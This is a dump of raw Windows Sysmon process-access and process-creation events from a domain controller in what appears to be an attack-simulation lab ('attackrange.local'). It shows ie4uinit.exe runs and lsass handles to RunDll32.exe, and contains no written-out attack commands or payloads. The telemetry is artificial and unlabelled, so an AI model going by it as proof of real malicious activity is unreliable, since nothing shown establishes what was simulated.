13:58:23.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.664{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.664{59A5CD1D-93FF-6005-0005-00000000A301}30803692C:\Windows\System32\ie4uinit.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ie4uinit.exe+2d19|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000011188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.679{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXEC:\Windows\System32\ie4uinit.exe -ClearIconCacheC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe"C:\Windows\System32\ie4uinit.exe" -UserConfig 10341000x800000000000000011187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.227{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.227{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.211{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\shsvcs.dll+11f99|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.211{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x101068C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\shsvcs.dll+11f27|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.149{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.133{59A5CD1D-93FA-6005-FC04-00000000A301}37843160C:\Windows\Explorer.EXE{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+551ba4|C:\Windows\System32\SHELL32.dll+551600|C:\Windows\System32\SHELL32.dll+551774|C:\Windows\System32\SHELL32.dll+203065|C:\Windows\System32\SHELL32.dll+202f20|C:\Windows\System32\SHELL32.dll+45f51 154100x800000000000000011177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.143{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXE"C:\Windows\System32\ie4uinit.exe" -UserConfigC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000011220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 